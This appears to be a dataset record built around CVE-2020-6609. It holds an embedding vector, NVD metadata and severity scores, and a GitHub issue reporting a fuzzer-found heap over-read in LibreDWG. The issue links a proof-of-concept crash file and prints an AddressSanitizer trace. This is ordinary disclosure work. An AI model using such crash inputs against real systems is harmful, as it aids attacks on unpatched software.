0.008265392854809761, 0.01910191960632801, -0.007727924734354019, -0.002142610726878047, -0.0036987271159887314, -0.017649302259087563, -0.0219635758548975, 0.012209249660372734, 0.0025202911347150803, -0.012448931112885475, -0.004285221453756094, -0.019988015294075012, -0.01359649933874607, -0.01279755961149931, -0.004281589761376381, 0.010110217146575451, 0.014773119240999222, -0.01127957459539175, 0.027091315016150475, -0.0029524448327720165, 0.0010304504539817572, -0.0026001851074397564, -0.011177890934050083, -0.0046774279326200485, -0.014453543350100517, -0.011381257325410843, 0.02425871044397354, -0.033352095633745193, -0.010444319806993008, -0.03370072320103645, 0.004154485650360584, 0.0015888003399595618, -0.001807600841857493, -0.019784649834036827, -0.003451782278716564, -0.018942130729556084, 0.007157772313803434, 0.012986400164663792, 0.0021553211845457554, -0.02056906372308731, 0.026800790801644325, -0.009783378802239895, 0.004575744736939669, 0.020990321412682533, -0.009797904640436172, -0.026960579678416252, 0.032596733421087265, 0.013247870840132236, 0.004078223370015621, 0.01256514061242342, -0.011838831938803196, -0.010066638700664043, 0.010858315043151379, 0.0026964209973812103, -0.009521907195448875, -0.004259800538420677, 0.011758938431739807, -0.018302978947758675, -0.006859985645860434, -0.002596553647890687, 0.023343563079833984, 0.009013490751385689, 0.031667061150074005, 0.006395148113369942, 0.020612642168998718, 0.0033192308619618416, 0.02115011028945446, -0.024157028645277023, 0.0003204837266821414, -0.02360503375530243, -0.005087792407721281, 0.006075572222471237, 0.00799665879458189, -0.0025983694940805435, -0.017257094383239746, 0.007386559620499611, -0.01191872637718916, 0.008069289848208427, -0.0025239228270947933, 0.017591197043657303, -0.017198991030454636, 0.004869900178164244, 0.005193107295781374, 0.008773809298872948, -0.0009814247023314238, 0.003629727754741907, 0.008149183355271816, 0.006921722088009119, -0.014054073952138424, 0.008599495515227318, 0.004096381366252899, -0.02296588197350502, -0.022602727636694908, -0.01833203248679638, 0.00007478710176656023, -0.008417918346822262, 0.025754906237125397, -0.010567791759967804, 0.009412961080670357, 0.004721006844192743, -0.0019501389469951391, 0.016966572031378746, 0.01306629367172718, 0.015949739143252373, 0.0014326439704746008, 0.03157990425825119, 0.017954351380467415, -0.003079548943787813, -0.006504094693809748, -0.007263087201863527, -0.0024004504084587097, 0.006496831309050322, -0.001126686343923211, -0.0019937173929065466, 0.0046992176212370396, -0.017184464260935783, 0.006322517525404692, -0.007873186841607094, 0.006155466195195913, 0.003791331546381116, 0.005839521996676922, -0.030243495479226112, -0.020423801615834236, -0.010887367650866508, -0.002434950089082122, 0.016545312479138374, -0.0031630743760615587, 0.030156338587403297, -0.022747989743947983, -0.013632814399898052, -0.009245909750461578, -0.0034445191267877817, 0.022660832852125168, 0.002567501273006201, -0.01353113166987896, 0.020162329077720642, -0.015368692576885223, 0.007226771675050259, 0.005320211406797171, 0.0046883225440979, -0.013102609664201736, 0.016138579696416855, 0.013153450563549995, -0.00020733843848574907, 0.007397454231977463, 0.00849781185388565, 0.03204474225640297, 0.03492092341184616, -0.014961959794163704, 0.002834419719874859, 0.029952971264719963, 0.007742451038211584, 0.025144807994365692, 0.01740235649049282, 0.002404081868007779, 0.005752365104854107, 0.0044958507642149925, 0.012528825551271439, -0.01657436415553093, 0.0023786609526723623, -0.028195304796099663, -0.016908466815948486, 0.0024912389926612377, -0.008505075238645077, -0.012274617329239845, 0.015572058968245983, 0.005080529488623142, -0.013545657508075237, -0.00046619941713288426, -0.0022715304512530565, 0.024345867335796356, 0.030621174722909927, 0.008926333859562874, 0.03311967849731445, 0.012013145722448826, 0.011613676324486732, 0.00333194131962955, 0.0022769777569919825, 0.016835836693644524, 0.004938899073749781, 0.002703684149309993, 0.001850271481089294, 0.003943856339901686, 0.004844479262828827, -0.006435095332562923, -0.00987053569406271, 0.013422185555100441, 0.0017177200643345714, -0.0015034590614959598, -0.025987325236201286, 0.02383745275437832, -0.016124052926898003, 0.023125668987631798, 0.000455531757324934, -0.001458972692489624, -0.0010023060021921992, 0.017445934936404228, -0.0439562052488327, 0.011366731487214565, -0.008577706292271614, -0.002313293283805251, 0.02934287302196026, -0.0017159043345600367, -0.027556153014302254, -0.016298366710543633, -0.008178235962986946, -0.01792529970407486, 0.01467869896441698, -0.0067873550578951836, -0.010763894766569138, 0.007081510033458471, -0.01145388837903738, -0.025086702778935432, -0.012855663895606995, -0.00007575172639917582, -0.016182158142328262, 0.008345287293195724, 0.019072866067290306, -0.03948214277625084, 0.012819348834455013, 0.018608029931783676, -0.005716049578040838, 0.00890454463660717, -0.005095055792480707, -0.0005265738000161946, 0.0012147512752562761, -0.0011439361842349172, -0.010967262089252472, -0.006249886471778154, -0.010335372760891914, 0.008744756691157818, 0.004074591677635908, -0.024679969996213913, -0.018201297149062157, -0.0033047045581042767, 0.013073557056486607, -0.024709021672606468, -0.000012625288036360871, 0.0072558242827653885, 0.005066003184765577, -0.013640077784657478, 0.021062953397631645, -0.013160713948309422, 0.023329036310315132, 0.006616672500967979, -0.007263087201863527, -0.02472354844212532, 0.0007204074645414948, 0.0054182629100978374, -0.0007049734122119844, 0.009195067919790745, -0.01751856692135334, -0.004644744098186493, 0.003678753739222884, -0.00456848181784153, -0.011933252215385437, 0.005483631044626236, 0.003769542323425412, -0.013378606177866459, -0.00691445916891098, -0.006122782360762358, 0.006928985007107258, -0.00996495597064495, -0.018942130729556084, -0.00936938263475895, -0.005803206469863653, 0.025290070101618767, 0.011177890934050083, 0.0007403809577226639, -0.0046047973446547985, 0.002284240908920765, 0.001305539975874126, -0.015601111575961113, 0.022864198312163353, -0.004074591677635908, -0.006536778528243303, 0.011003577150404453, -0.00940569769591093, 0.0028907086234539747, 0.003695095656439662, -0.019116446375846863, -0.01016832236200571, -0.010117480531334877, 0.006954405922442675, 0.010713053867220879, 0.017489513382315636, -0.006820038892328739, -0.005490893963724375, -0.028195304796099663, -0.028108147904276848, 0.010858315043151379, -0.007560873869806528, 0.00045621267054229975, 0.006162729579955339, -0.018172243610024452, 0.010393477976322174, 0.011344942264258862, 0.03082454204559326, 0.0016169447917491198, -0.01016832236200571, 0.025101229548454285, 0.030766436830163002, 0.009362119249999523, -0.021121056750416756, 0.003326494013890624, 0.020714323967695236, 0.003878488438203931, 0.006130045745521784, 0.0014853012980893254, 0.002031848533079028, 0.0134730264544487, 0.004938899073749781, -0.007005247753113508, 0.013894286006689072, -0.007230403367429972, -0.0044958507642149925, 0.02630690112709999, -0.0016505365492776036, -0.0025275542866438627, 0.019842755049467087, -0.002193452324718237, -0.017155412584543228, -0.007092404644936323, -0.007310297340154648, 0.002974234288558364, -0.001660523354075849, -0.017242569476366043, -0.00019417409203015268, -0.005832259077578783, 0.019348863512277603, -0.008112868294119835, -0.010408003814518452, -0.019523179158568382, -0.0024367657024413347, -0.00620993971824646, -0.01016832236200571, -0.006551304832100868, -0.0007054273155517876, -0.0014489858876913786, 0.0043287998996675014, 0.016545312479138374, -0.020656220614910126, -0.009304014965891838, -0.00805476401001215, 0.008715705014765263, 0.0012256460031494498, -0.007924027740955353, 0.0014172098599374294, -0.014606067910790443, 0.030766436830163002, 0.011206943541765213, 0.009986745193600655, 0.0022697148378938437, 0.007194087840616703, 0.013603762723505497, -0.0009264975669793785, -0.026219744235277176, 0.010466109029948711, 0.004989740904420614, 0.01751856692135334, -0.0049715833738446236, 0.011068944819271564, -0.0013908811379224062, 0.016501734033226967, -0.01016832236200571, -0.008062026463449001, 0.0020609009079635143, -0.008279919624328613, 0.028020991012454033, 0.009790641255676746, -0.003115864470601082, -0.023038512095808983, 0.006525883916765451, 0.021338950842618942, -0.01852087303996086, 0.0028217092622071505, -0.0008298077154904604, 0.00846149679273367, 0.0006514081032946706, 0.027904780581593513, 0.015484902076423168, 0.014889328740537167, 0.00446679862216115, 0.0066965664736926556, -0.030127285048365593, 0.007350244093686342, 0.0061482032760977745, -0.00825813040137291, -0.003769542323425412, -0.005407368298619986, 0.00779329240322113, -0.02536270022392273, 0.0047827428206801414, 0.0187532901763916, -0.016080474480986595, -0.0068926699459552765, -0.02594374679028988, -0.005981152411550283, 0.011504730209708214, 0.0049715833738446236, 0.020365696400403976, -0.00849781185388565, -0.0052366857416927814, 0.010611370205879211, -0.010059375315904617, 0.0058794692158699036, 0.0040419078432023525, -0.00008619241998530924, 0.004448641091585159, -0.00320665305480361, 0.004815426655113697, 0.00030641150078736246, -0.0021916364785283804, 0.0021807418670505285, -0.0041472227312624454, 0.03105696104466915, -0.004702848847955465, 0.024040818214416504, 0.0069653005339205265, -0.008563179522752762, -0.009195067919790745, -0.0260744821280241, 0.02032211795449257, -0.020656220614910126, 0.005861311219632626, 0.0039002778939902782, 0.019900858402252197, 0.006489568389952183, -0.007186824921518564, 0.016429103910923004, 0.011744411662220955, -0.007063352502882481, 0.00691445916891098, -0.01115610171109438, 0.015804477035999298, 0.0398598238825798, -0.012855663895606995, 0.03134748339653015, 0.00987053569406271, -0.019348863512277603, -0.0004907123511657119, -0.014853013679385185, -0.0054218946024775505, -0.0068781436420977116, -0.007982132956385612, 0.007553610485047102, 0.0006173623842187226, -0.007582663092762232, 0.025522489100694656, 0.0007753345416858792, -0.009115174412727356, 0.005498156882822514, 0.0047827428206801414, -0.0036769378930330276, 0.009747062809765339, 0.0034663083497434855, -0.013872496783733368, 0.009725273586809635, -0.009899587370455265, -0.018942130729556084, 0.0014698673039674759, 0.0037622791714966297, 0.010843789204955101, 0.016036896035075188, -0.005647050216794014, 0.01162820216268301, -0.006522252224385738, 0.02043832652270794, -0.008265392854809761, -0.015252483077347279, -0.030388757586479187, 0.008621284738183022, 0.004136328119784594, 0.01309534627944231, 0.011751675046980381, 0.0043142735958099365, 0.004303378984332085, -0.0031086013186722994, 0.0006645724643021822, -0.007473716512322426, -0.009979481808841228, -0.02800646424293518, 0.018361084163188934, 0.01576089859008789, -0.026205219328403473, 0.006137308664619923, -0.009354855865240097, -0.014809434302151203, -0.003615201683714986, 0.00024558312725275755, 0.01968296617269516, -0.007989396341145039, -0.007480979897081852, -0.0047863745130598545, -0.026263322681188583, -0.0029161295387893915, -0.0052439491264522076, -0.010821999981999397, 0.01669057458639145, -0.001637826208025217, 0.01669057458639145, -0.0041472227312624454, -0.007215877063572407, 0.0022642675321549177, -0.011141575872898102, 0.013545657508075237, 0.012950084172189236, -0.0117153599858284, 0.013080820441246033, -0.005741470493376255, 0.009696220979094505, 0.029328346252441406, -0.02391008287668228, -0.004118170589208603, 0.010495160706341267, 0.004016487393528223, -0.009209594689309597, -0.008919071406126022, 0.007924027740955353, 0.01857897639274597, -0.011235996149480343, 0.011373994871973991, -0.024621864780783653, -0.008839176967740059, 0.016065949574112892, 0.018840448930859566, 0.026321427896618843, 0.015354166738688946, 0.0025130282156169415, 0.0027690520510077477, -0.011475677601993084, -0.0006899932632222772, 0.015208904631435871, 0.017591197043657303, -0.010240952484309673, -0.006522252224385738, 0.008715705014765263, 0.00963811669498682, 0.002741815522313118, 0.014961959794163704, -0.013952390290796757, -0.04235832393169403, -0.010335372760891914, -0.019828228279948235, -0.0018257584888488054, 0.005552629940211773, 0.013211555778980255, 0.0001678453991189599, 0.018361084163188934, -0.0019937173929065466, 0.004474061541259289, 5.532429554477858e-7, 0.0072558242827653885, 0.019639387726783752, 0.00009339876123704016, 0.0007458282634615898, 0.007223139982670546, 0.006729250308126211, -0.0019229023018851876, -0.009129700250923634, -0.012753981165587902, 0.02067074552178383, -0.01599331758916378, -0.03497902676463127, -0.010240952484309673, 0.021861892193555832, -0.015717320144176483, 0.010095691308379173, -0.02524649165570736, 0.00431790528818965, 0.009187805466353893, 0.011693570762872696, -0.009550959803164005, -0.009296751581132412, -0.0031939425971359015, 0.01775098592042923, 0.007357507478445768, -0.01798340305685997, 0.0013699998380616307, -0.012427141889929771, 0.011933252215385437, -0.002494870452210307, -0.008940860629081726, 0.005440052133053541, -0.013814391568303108, 0.0033591778483241796, -0.020351169630885124, -0.008149183355271816, 0.01107620820403099, 0.01991538517177105, 0.013305976055562496, -0.006260781083256006, -0.0020954005885869265, 0.010306321084499359, -0.030011076480150223, -0.0024585549253970385, 0.0025729485787451267, 0.024752601981163025, -0.004412325564771891, -0.0121584078297019, -0.012020409107208252, 0.02045285329222679, -0.009550959803164005, 0.002031848533079028, 0.0019392442191019654, -0.008091079071164131, 0.018375610932707787, -0.0025892904959619045, -0.010008534416556358, -0.009972218424081802, 0.01370544545352459, 0.00008851887832861394, 0.00355891278013587, 0.01657436415553093, 0.005309316795319319, 0.017300672829151154, 0.003094075247645378, 0.0003570261178538203, -0.0012510668020695448, -0.0024585549253970385, 0.030272547155618668, -0.01087284181267023, 0.026757212355732918, -0.013887022621929646, -0.004862636793404818, -0.015223430469632149, 0.004194432869553566, 0.003747752867639065, 0.012231038883328438, -0.0019574020989239216, 0.005730575881898403, -0.0269460529088974, -0.004445009399205446, 0.0020899532828480005, 0.002585659036412835, -0.016966572031378746, -0.03538576140999794, -0.0037332267966121435, 0.0003434078535065055, -0.004731901455670595, 0.0131752397865057, 0.010705790482461452, -0.024854283779859543, -0.024868810549378395, -0.009282225742936134, 0.00043487735092639923, 0.012027672491967678, 0.008185499347746372, 0.0071432460099458694, 0.01470775157213211, 0.022646306082606316, 0.013080820441246033, 0.014184809289872646, -0.004219853784888983, -0.0019283496076241136, -0.007582663092762232, 0.0056034717708826065, -0.006591251585632563, 0.0010340820299461484, 0.006344306748360395, 0.0266555305570364, -0.0015252482844516635, 0.012049461714923382, -0.006816407199949026, -0.006122782360762358, -0.01792529970407486, 0.005919415969401598, 0.005661576520651579, 0.024767126888036728, -0.016893940046429634, 0.011671781539916992, -0.00641330610960722, 0.016429103910923004, -0.01862255483865738, -0.019784649834036827, -0.00146441999822855, 0.0164000503718853, 0.012463457882404327, 0.030388757586479187, 0.004441377706825733, 0.002656474243849516, 0.01616763137280941, 0.004975214600563049, -0.007085141725838184, 0.013574710115790367, -0.00027145788772031665, 0.02226862497627735, 0.002652842551469803, 0.019203603267669678, -0.00653314683586359, -0.018186770379543304, 0.0026038167998194695, 0.007633504457771778, 0.0004648375906981528, 0.0007372033433057368, 0.029662448912858963, -0.04479872062802315, -0.015543006360530853, 0.001762206549756229, 0.017794564366340637, 0.004310642369091511, -0.016240263357758522, -0.0036878325045108795, -0.02097579650580883, -0.002556606661528349, 0.04110907390713692, -0.0036478855181485415, -0.009681695140898228, -0.011584623716771603, 0.013916075229644775, -0.0007571768364869058, -0.03187042474746704, 0.022704411298036575, 0.00607920391485095, 0.018666133284568787, 0.01698109693825245, -0.010299057699739933, 0.0035407550167292356, 0.003940224647521973, 0.008781072683632374, 0.0014635120751336217, 0.0046992176212370396, -0.011410309933125973, -0.007001616060733795, -0.01423565112054348, 0.011570097878575325, -0.008098342455923557, 0.0037586477119475603, 0.004532166291028261, 0.0041326964274048805, 0.007953080348670483, -0.009347593411803246, 0.005741470493376255, -0.02524649165570736, 0.013218818232417107, 0.0026673688553273678, 0.01561563741415739, -0.013117135502398014, -0.004622954875230789, 0.0015061827143654227, -0.006177255418151617, -0.01253608800470829, 0.004753690678626299, 0.024403972551226616, 0.0012201986974105239, -0.009587274864315987, 0.001986454240977764, -0.008534127846360207, 0.005676102824509144, -0.002965155290439725, -0.004070960450917482, -0.004800900816917419, 0.006478673778474331, 0.020075172185897827, 0.008737494237720966, -0.004731901455670595, 0.010974524542689323, -0.0013609209563583136, 0.0054218946024775505, -0.008490548469126225, 0.003515334101393819, -0.01221651304513216, -0.002625606022775173, 0.03384598717093468, -0.011679043993353844, 0.009449276141822338, 0.022893249988555908, -0.002313293283805251, 0.00890454463660717, -0.011679043993353844, -0.0069834585301578045, -0.011148839257657528, 0.0028816298581659794, 0.014359123073518276, -0.001779456390067935, 0.012499772943556309, -0.013313238508999348, 0.0017004703404381871, -0.015296061523258686, 0.0044195884838700294, 0.0058576799929142, -0.007924027740955353, 0.00502242473885417, -0.005748733412474394, 0.015543006360530853, 0.009790641255676746, -0.011599150486290455, 0.008599495515227318, 0.008345287293195724, 0.015964265912771225, 0.0008652152610011399, -0.008991701528429985, 0.00467016501352191, 0.0019283496076241136, 0.011613676324486732, -0.005999309942126274, -0.012724928557872772, -0.018767816945910454, 0.008345287293195724, 0.001370907761156559, -0.007916765287518501, -0.028616564348340034, 0.007444664370268583, 0.011664518155157566, -0.018535397946834564, 0.0136255519464612, 0.004953425377607346, 0.007858660072088242, 0.0089335972443223, -0.02453470788896084, 0.017489513382315636, -0.00018259855278301984, -0.00547636765986681, 0.02080148085951805, -0.01763477548956871, -0.010110217146575451, -0.007640767842531204, -0.006435095332562923, 0.006591251585632563, -0.012528825551271439, -0.004822690039873123, 0.0005874022026546299, -0.046832386404275894, 0.009623590856790543, 0.005349263548851013, 0.007125088479369879, 0.005349263548851013, 0.03332304581999779, -0.0018493635579943657, 0.0014526174636557698, -0.001308263628743589, 0.009957692585885525, 0.0016133132157847285, 0.0024385815486311913, -0.016036896035075188, 0.0009342145640403032, 0.004928004462271929, -0.011606412939727306, -0.012223775498569012, 0.04828500375151634, 0.013574710115790367, 0.005447315517812967, 0.007244929671287537, -0.0025420805905014277, 0.017649302259087563, 0.006823670584708452, -0.028151726350188255, -0.017547618597745895, 0.007982132956385612, -0.004027382005006075, -0.01576089859008789, 0.020757902413606644, -0.026234271004796028, 0.012761244550347328, -0.006954405922442675, -0.011097997426986694, 0.005745102185755968, -0.02829698845744133, -0.018593503162264824, -0.0043142735958099365, -0.003856699215248227, 0.012993662618100643, -0.009565485641360283, -0.0009246817789971828, 0.010698527097702026, -0.010611370205879211, 0.008548653684556484, -0.00012131625408073887, -0.023387141525745392, 0.014170283451676369, -0.006307991221547127, 0.012339984998106956, 0.014301018789410591, 0.004666533321142197, 0.00597752071917057, 0.006090098526328802, 0.01863708160817623, -0.005105950403958559, -0.016676047816872597, -0.01692299358546734, -0.0023514244239777327, -0.0013872496783733368, -0.0025148438289761543, 0.016603417694568634, 0.00014287854719441384, 0.019377917051315308, -0.003998329397290945, -0.010909156873822212, -0.0044377464801073074, 0.006729250308126211, 0.0046774279326200485, -0.017155412584543228, 0.02308209054172039, 0.00345722958445549, -0.012318195775151253, 0.012855663895606995, -0.00843244418501854, -0.006565830670297146, -0.010117480531334877, 0.0009496486745774746, -0.005723312497138977, -0.017605723813176155, -0.00033614475978538394, -0.0101029546931386, -0.012434405274689198, 0.020351169630885124, 0.015020064078271389, -0.028050042688846588, 0.025086702778935432, -0.011417573317885399, 0.003192126750946045, -0.004644744098186493, -0.006743776611983776, -0.03227715939283371, -0.01916002482175827, 0.01674867980182171, -0.015368692576885223, -0.018724238499999046, 0.0040600658394396305, -0.017373304814100266, -0.015688268467783928, -0.005026056431233883, -0.0014535252703353763, -0.01634194701910019, -0.00820002518594265, -0.004928004462271929, -0.010335372760891914, -0.012260091491043568, 0.029023297131061554, 0.02209431119263172, 0.009957692585885525, -0.017082780599594116, 0.0009387540048919618, -0.0028507616370916367, -0.014526174403727055, -0.004325168207287788, -0.004190801177173853, 0.004561218898743391, 0.01387975923717022, 0.00492074154317379, 0.030737385153770447, -0.014046810567378998, 0.002616527257487178, -0.00315581145696342, -0.013371343724429607, -0.014526174403727055, -0.015949739143252373, -0.013378606177866459, -0.007749713957309723, 0.023517876863479614, 0.012732191942632198, -0.017605723813176155, 0.001714088604785502, -0.00034091115230694413, -0.0022116100881248713, 0.009696220979094505, 0.015078169293701649, 0.017707405611872673, -0.00411453889682889, 0.01127957459539175, -0.0037731737829744816, 0.026917001232504845, 0.014054073952138424, 0.014112178236246109, -0.002204346936196089, 0.01792529970407486, 0.0034100194461643696, 0.0061518349684774876, 0.02682984434068203, 0.0009323988342657685, -0.012819348834455013, 0.017591197043657303, 0.0172716211527586, 0.005574419628828764, 0.006013836245983839, -0.008614021353423595, 0.015470375306904316, 0.018230348825454712, 0.0024512920062988997, -0.012427141889929771, 0.060777515172958374, -0.003918435424566269, -0.017184464260935783, 0.01145388837903738, 0.002885261317715049, -0.014293755404651165, -0.019247181713581085, -0.009492854587733746, -0.027105841785669327, 0.019784649834036827, 0.0063261487521231174, 0.012819348834455013, 0.005073266569525003, 0.0018829553155228496, 0.012231038883328438, 0.023445244878530502, 0.004597533959895372, -0.009885061532258987, 0.004103644285351038, -0.0137708131223917, -0.008287182077765465, -0.00934033002704382, 0.010734843090176582, 0.009826957248151302, -0.001830297987908125, 0.00013311876682564616, -0.013393132947385311, 0.002198899630457163, -0.003598859766498208, -0.013894286006689072, 0.003805857617408037, 0.00401285570114851, -0.009420224465429783, 0.015078169293701649, 0.023997239768505096, -0.00013005465734750032, 0.008105604909360409, 0.022806093096733093, 0.0048590051010251045, 0.017765510827302933, 0.0063334121368825436, -0.005109581630676985, 0.02014780417084694, 0.035240497440099716, -0.0007884989026933908, -0.015020064078271389, -0.01891307905316353, 0.001489840797148645, -0.0047682165168225765, 0.007989396341145039, -0.008614021353423595, 0.008265392854809761, -0.004448641091585159, -0.005519946105778217, 0.017358778044581413, 0.02870372124016285, 0.001977375475689769, 0.009790641255676746, 0.017155412584543228, 0.0021244529634714127, -0.01379986573010683, 0.0035861493088304996, 0.015746373683214188 ]
308
CVE-2020-6609
2020-01-08T21:15:11.193000
GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in read_pages_map in decode_r2007.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issue-544834443" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/179#issue-544834443
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Several bugs found by fuzzing Issue date: --- start body --- Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 